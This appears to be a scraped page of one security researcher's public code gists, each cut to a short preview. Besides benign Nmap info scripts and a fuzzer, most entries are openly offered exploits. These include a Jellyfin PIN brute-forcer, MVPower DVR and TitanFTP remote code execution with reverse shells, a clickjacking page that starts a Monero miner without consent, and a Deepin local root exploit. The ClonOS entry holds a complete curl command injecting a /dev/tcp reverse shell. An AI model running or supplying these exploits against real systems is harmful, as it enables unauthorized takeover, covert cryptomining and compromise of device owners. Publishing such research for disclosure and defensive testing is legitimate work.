bcoles

@bcoles
bcoles / http-igd-info.nse
Created January 29, 2012 04:38
http-igd-info.nse - Attempts to retrieve device information from an Internet Gateway Device (IGD) UPnP configuration file.
description = [[
Attempts to retrieve device information from an Internet Gateway Device (IGD)
UPnP configuration file.
For more information, see:
http://upnp.org/specs/gw/igd2
http://en.wikipedia.org/wiki/Internet_Gateway_Device_Protocol
]]
---

@bcoles
bcoles / gpsd-ng-info.nse
Created January 24, 2012 12:41
gpsd-ng-info.nse - Retrieves device and version information from a listening GPSD-NG daemon.
description = [[
Retrieves device and version information from a listening GPSD-NG daemon.
gpsd is a service daemon that monitors one or more GPSes or AIS receivers attached to a host computer through serial or USB ports, making all data on the location/course/velocity of the sensors available to be queried on TCP port 2947 of the host computer.
For more information about GPSD-NG, see:
http://gpsd.berlios.de/gpsd.html
http://en.wikipedia.org/wiki/Gpsd
http://gpsd.berlios.de/protocol-evolution.html
]]

@bcoles
bcoles / miller-fuzz.rb
Created July 9, 2017 21:19
A Ruby port of Charlie Miller's infamous 5 line Python dumb fuzzer
#!/usr/bin/env ruby
#
# A Ruby port of Charlie Miller's infamous 5 line Python dumb fuzzer
# ~ bcoles
=begin
# Original Python code:
numwrites = random.randrange(math.ceil((float(len(buf)) / FuzzFactor))) + 1
for j in range(numwrites):
rbyte = random.randrange(256)

@bcoles
bcoles / jellyfin-brute.rb
Created August 21, 2019 16:02
Jellyfin Password Reset PIN Brute Force
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force #
# #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. #
# This will likely also work on Emby Media Server, but untested. #
# #
# Note: cURL must be installed and in $PATH #
# #
# Note: Upon successful exploitation, the password will be reset for all users, #

@bcoles
bcoles / mvpower_dvr_shell_exec_telnet.rb
Created February 25, 2017 11:52
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string. This module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an interactive remote shel…
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient

@bcoles
bcoles / clickjack-authedmine.html
Created October 21, 2017 19:32
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
<html>
<body>
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
</div>
</body>
<script>
window.onmousemove = function(e) {
var container = document.getElementById("container");

@bcoles
bcoles / titanftp-server-admin-event-handler-rce
Last active March 22, 2020 04:19
titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...

@bcoles
bcoles / clonos-root-rce.sh
Last active November 4, 2019 13:30
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"

@bcoles
bcoles / bitmon.py
Created May 20, 2011 10:36
monitors irc.lfnet.org:6667#bitcoin and extracts user details
################################################################################
# bitmon
# Description: monitors irc.lfnet.org:6667#bitcoin and extracts user details
# Author: Brendan Coles <bcoles@gmail.com>
# Version: 0.1-20110520
################################################################################
import socket, string
botname = 'u1rt6zQzvGpS1Zz' # change this
channel = '#bitcoin'

@bcoles
bcoles / lastore-daemon-root.sh
Created March 24, 2018 22:39
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/